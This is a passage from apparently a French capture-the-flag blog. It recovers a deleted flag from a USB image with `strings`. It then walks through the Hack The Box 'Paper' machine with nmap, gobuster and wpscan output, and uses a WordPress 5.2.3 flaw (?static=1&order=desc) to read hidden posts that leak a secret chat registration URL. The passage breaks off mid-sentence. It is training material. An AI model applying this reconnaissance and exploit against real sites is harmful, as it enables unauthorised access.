class="cl">2+1 records out </span></span><span class="line"><span class="cl"><span class="m">10485760</span> bytes <span class="o">(</span><span class="m">10</span> MB<span class="o">)</span> copied, 0.0202228 s, <span class="m">519</span> MB/s </span></span></code></pre></td></tr></table> </div> </div><h3 id="forensics-on-the-img">forensics on the img </h3><p>En utilisant la commande <code>strings</code> (meme pas besoin de autopsy&hellip;) on trouve rapidement le flag dans l&rsquo;image de la clé usb.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@raspberrypi:~# strings usbstick.img </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">/media/usbstick </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">damnit.txt </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">/media/usbstick </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">damnit.txt </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">/media/usbstick </span></span><span class="line"><span class="cl">2<span class="o">]</span>8^ </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">damnit.txt </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">3d3e.....020b <span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span> HERE IT IS </span></span><span class="line"><span class="cl">Damnit! Sorry man I accidentally deleted your files off the USB stick. </span></span><span class="line"><span class="cl">Do you know <span class="k">if</span> there is any way to get them back? </span></span><span class="line"><span class="cl">-James </span></span></code></pre></td></tr></table> </div> </div><h3 id="bonus">BONUS </h3><p>On pouvait faire un string directement sur le volume de la clé usb&hellip; ca marche aussi !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@raspberrypi:~# strings /dev/sdb </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">/media/usbstick </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">damnit.txt </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">/media/usbstick </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">damnit.txt </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">/media/usbstick </span></span><span class="line"><span class="cl">2<span class="o">]</span>8^ </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">damnit.txt </span></span><span class="line"><span class="cl">&gt;r <span class="p">&amp;</span> </span></span><span class="line"><span class="cl">3d3e.....020b </span></span><span class="line"><span class="cl">Damnit! Sorry man I accidentally deleted your files off the USB stick. </span></span><span class="line"><span class="cl">Do you know <span class="k">if</span> there is any way to get them back? </span></span><span class="line"><span class="cl">-James </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/paper-htb/Sat, 01 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/paper-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Paper cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Paper</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.143</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.143 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-01-24 06:38 EST </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.143 </span></span><span class="line"><span class="cl">Host is up, received echo-reply ttl <span class="m">63</span> <span class="o">(</span>0.018s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Scanned at 2025-01-24 06:38:11 EST <span class="k">for</span> 35s </span></span><span class="line"><span class="cl">Not shown: <span class="m">65532</span> closed tcp ports <span class="o">(</span>reset<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.0 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcZzzauRoUMdyj6UcbrSejflBMRBeAdjYb2Fkpkn55uduA3qShJ5SP33uotPwllc3wESbYzlB9bGJVjeGA2l+G99r24cqvAsqBl0bLStal3RiXtjI/ws1E3bHW1+U35bzlInU7AVC9HUW6IbAq+VNlbXLrzBCbIO+l3281i3Q4Y2pzpHm5OlM2mZQ8EGMrWxD4dPFFK0D4jCAKUMMcoro3Z/U7Wpdy+xmDfui3iu9UqAxlu4XcdYJr7Iijfkl62jTNFiltbym1AxcIpgyS2QX1xjFlXId7UrJOJo3c7a0F+B3XaBK5iQjpUfPmh7RLlt6CZklzBZ8wsmHakWpysfXN </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE/Xwcq0Gc4YEeRtN3QLduvk/5lezmamLm9PNgrhWDyNfPwAXpHiu7H9urKOhtw9SghxtMM2vMIQAUh/RFYgrxg<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdmmhk1vKOrAmcXMPh0XRA5zbzUHt1JBbbWwQpI4pEX </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.37 <span class="o">((</span>centos<span class="o">)</span> OpenSSL/1.1.1k mod_fcgid/2.3.9<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: POST OPTIONS HEAD GET TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.37 <span class="o">(</span>centos<span class="o">)</span> OpenSSL/1.1.1k mod_fcgid/2.3.9 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: HTML Tidy <span class="k">for</span> HTML5 <span class="k">for</span> Linux version 5.7.28 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: HTTP Server Test Page powered by CentOS </span></span><span class="line"><span class="cl">443/tcp open ssl/http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.37 <span class="o">((</span>centos<span class="o">)</span> OpenSSL/1.1.1k mod_fcgid/2.3.9<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> tls-alpn: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ http/1.1 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: HTTP Server Test Page powered by CentOS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: HTML Tidy <span class="k">for</span> HTML5 <span class="k">for</span> Linux version 5.7.28 </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>localhost.localdomain/organizationName<span class="o">=</span>Unspecified/countryName<span class="o">=</span>US/emailAddress<span class="o">=</span>root@localhost.localdomain </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:localhost.localdomain </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>localhost.localdomain/organizationName<span class="o">=</span>Unspecified/countryName<span class="o">=</span>US/emailAddress<span class="o">=</span>root@localhost.localdomain/organizationalUnitName<span class="o">=</span>ca-3899279223185377061 </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-07-03T08:52:34 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-07-08T10:32:34 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 579a:92bd:803c:ac47:d49c:5add:e44e:4f84 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 61a2:301f:9e5c:2603:a643:00b5:e5da:5fd5:c175:f3a9 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIE4DCCAsigAwIBAgIIdryw6eirdUUwDQYJKoZIhvcNAQELBQAwgY8xCzAJBgNV </span></span><span class="line"><span class="cl"><span class="p">|</span> BAYTAlVTMRQwEgYDVQQKDAtVbnNwZWNpZmllZDEfMB0GA1UECwwWY2EtMzg5OTI3 </span></span><span class="line"><span class="cl"><span class="p">|</span> mh/ptg<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: POST OPTIONS HEAD GET TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.37 <span class="o">(</span>centos<span class="o">)</span> OpenSSL/1.1.1k mod_fcgid/2.3.9 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="officepaper">office.paper </h3><p>En utilisant burp, on observe une réponse HTTP avec le header &ldquo;Backend-server: office.paper&rdquo;. En l&rsquo;ajoutant a /etc/hosts, on accède à une nouvelle page web.</p> <h3 id="dirsearch">dirsearch </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> gobuster dir -u http://office.paper -t <span class="m">50</span> -w /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://office.paper </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/.htaccess <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199<span class="o">]</span> </span></span><span class="line"><span class="cl">/.htpasswd <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199<span class="o">]</span> </span></span><span class="line"><span class="cl">/.hta <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199<span class="o">]</span> </span></span><span class="line"><span class="cl">/cgi-bin/ <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199<span class="o">]</span> </span></span><span class="line"><span class="cl">/manual <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 235<span class="o">]</span> <span class="o">[</span>--&gt; http://office.paper/manual/<span class="o">]</span> </span></span><span class="line"><span class="cl">/index.php <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 1<span class="o">]</span> <span class="o">[</span>--&gt; http://office.paper/<span class="o">]</span> </span></span><span class="line"><span class="cl">/wp-admin <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 237<span class="o">]</span> <span class="o">[</span>--&gt; http://office.paper/wp-admin/<span class="o">]</span> </span></span><span class="line"><span class="cl">/wp-content <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 239<span class="o">]</span> <span class="o">[</span>--&gt; http://office.paper/wp-content/<span class="o">]</span> </span></span><span class="line"><span class="cl">/wp-includes <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 240<span class="o">]</span> <span class="o">[</span>--&gt; http://office.paper/wp-includes/<span class="o">]</span> </span></span><span class="line"><span class="cl">Progress: <span class="m">4614</span> / <span class="m">4615</span> <span class="o">(</span>99.98%<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="nv">Finished</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="wordpress">wordpress </h3><p>On observe avec dirsearch une page de login wordpress &ndash;&gt; /wp-admin</p> <h3 id="wp-scan">wp-scan </h3><p>On observe : WordPress version 5.2.3 identified (Insecure, released on 2019-09-04).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ wpscan --url http://office.paper </span></span><span class="line"><span class="cl">_______________________________________________________________ </span></span><span class="line"><span class="cl"> __ _______ _____ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span> / / __ <span class="se">\ </span>/ ____<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span> /<span class="se">\ </span> / /<span class="p">|</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> <span class="o">(</span>___ ___ __ _ _ __ ® </span></span><span class="line"><span class="cl"> <span class="se">\ \/</span> <span class="se">\/</span> / <span class="p">|</span> ___/ <span class="se">\_</span>__ <span class="se">\ </span>/ __<span class="p">|</span>/ _<span class="sb">`</span> <span class="p">|</span> <span class="s1">&#39;_ \ </span></span></span><span class="line"><span class="cl"><span class="s1"> \ /\ / | | ____) | (__| (_| | | | | </span></span></span><span class="line"><span class="cl"><span class="s1"> \/ \/ |_| |_____/ \___|\__,_|_| |_| </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> WordPress Security Scanner by the WPScan Team </span></span></span><span class="line"><span class="cl"><span class="s1"> Version 3.8.27 </span></span></span><span class="line"><span class="cl"><span class="s1"> Sponsored by Automattic - https://automattic.com/ </span></span></span><span class="line"><span class="cl"><span class="s1"> @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart </span></span></span><span class="line"><span class="cl"><span class="s1">_______________________________________________________________ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] URL: http://office.paper/ [10.10.11.143] </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Started: Thu Jan 30 10:22:59 2025 </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Interesting Finding(s): </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Headers </span></span></span><span class="line"><span class="cl"><span class="s1"> | Interesting Entries: </span></span></span><span class="line"><span class="cl"><span class="s1"> | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 </span></span></span><span class="line"><span class="cl"><span class="s1"> | - X-Powered-By: PHP/7.2.24 </span></span></span><span class="line"><span class="cl"><span class="s1"> | - X-Backend-Server: office.paper </span></span></span><span class="line"><span class="cl"><span class="s1"> | Found By: Headers (Passive Detection) </span></span></span><span class="line"><span class="cl"><span class="s1"> | Confidence: 100% </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] WordPress readme found: http://office.paper/readme.html </span></span></span><span class="line"><span class="cl"><span class="s1"> | Found By: Direct Access (Aggressive Detection) </span></span></span><span class="line"><span class="cl"><span class="s1"> | Confidence: 100% </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-04). </span></span></span><span class="line"><span class="cl"><span class="s1"> | Found By: Rss Generator (Passive Detection) </span></span></span><span class="line"><span class="cl"><span class="s1"> | - http://office.paper/index.php/feed/, &lt;generator&gt;https://wordpress.org/?v=5.2.3&lt;/generator&gt; </span></span></span><span class="line"><span class="cl"><span class="s1"> | - http://office.paper/index.php/comments/feed/, &lt;generator&gt;https://wordpress.org/?v=5.2.3&lt;/generator&gt; </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] WordPress theme in use: construction-techup </span></span></span><span class="line"><span class="cl"><span class="s1"> | Location: http://office.paper/wp-content/themes/construction-techup/ </span></span></span><span class="line"><span class="cl"><span class="s1"> | Last Updated: 2022-09-22T00:00:00.000Z </span></span></span><span class="line"><span class="cl"><span class="s1"> | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt </span></span></span><span class="line"><span class="cl"><span class="s1"> | [!] The version is out of date, the latest version is 1.5 </span></span></span><span class="line"><span class="cl"><span class="s1"> | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1 </span></span></span><span class="line"><span class="cl"><span class="s1"> | Style Name: Construction Techup </span></span></span><span class="line"><span class="cl"><span class="s1"> | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a... </span></span></span><span class="line"><span class="cl"><span class="s1"> | Author: wptexture </span></span></span><span class="line"><span class="cl"><span class="s1"> | Author URI: https://testerwp.com/ </span></span></span><span class="line"><span class="cl"><span class="s1"> | </span></span></span><span class="line"><span class="cl"><span class="s1"> | Found By: Css Style In Homepage (Passive Detection) </span></span></span><span class="line"><span class="cl"><span class="s1"> | </span></span></span><span class="line"><span class="cl"><span class="s1"> | Version: 1.1 (80% confidence) </span></span></span><span class="line"><span class="cl"><span class="s1"> | Found By: Style (Passive Detection) </span></span></span><span class="line"><span class="cl"><span class="s1"> | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: &#39;</span>Version: 1.1<span class="err">&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Enumerating All Plugins <span class="o">(</span>via Passive Methods<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> No plugins Found. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Enumerating Config Backups <span class="o">(</span>via Passive and Aggressive Methods<span class="o">)</span> </span></span><span class="line"><span class="cl"> Checking Config Backups - Time: 00:00:00 &lt;<span class="o">====================================================================================================================================================</span>&gt; <span class="o">(</span><span class="m">137</span> / 137<span class="o">)</span> 100.00% Time: 00:00:00 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> No Config Backups Found. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> No WPScan API Token given, as a result vulnerability data has not been output. </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> You can get a free API token with <span class="m">25</span> daily requests by registering at https://wpscan.com/register </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Finished: Thu Jan <span class="m">30</span> 10:23:06 <span class="m">2025</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Requests Done: <span class="m">169</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Cached Requests: <span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Data Sent: 42.416 KB </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Data Received: 167.972 KB </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Memory used: 280.184 MB </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Elapsed time: 00:00:07 </span></span></code></pre></td></tr></table> </div> </div><h3 id="viewing-unauthenticated-postsmd">Viewing unauthenticated posts.md </h3><p><a class="link" href="http://office.paper/?static=1&amp;order=desc" target="_blank" rel="noopener" >http://office.paper/?static=1&order=desc</a></p> <p>Permet d&rsquo;afficher des messages cachés normalement non accessible. C&rsquo;est une vulnerabilité de wordpress 5.2.3 :</p> <p>Vuln: <strong>Wordpress &lt;=5.2.3: viewing unauthenticated posts.md</strong></p> <p>On trouve le message suivant qui semble intéressant :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Secret Registration URL of new Employee chat system</span> </span></span><span class="line"><span class="cl">http://chat.office.paper/register/8qozr226AhkCHZdyY </span></span></code></pre></td></tr></table> </div> </div><p>On arrive sur une page, où l&rsquo;on peut créer un compte rapidement et on obtient l&rsquo;accès à une sorte de discord avec un chat: L&rsquo;application RocketChat.</p> <h3 id="rocketchat-bot">RocketChat bot </h3><p>En fouillant on voit qu&rsquo;il existe un 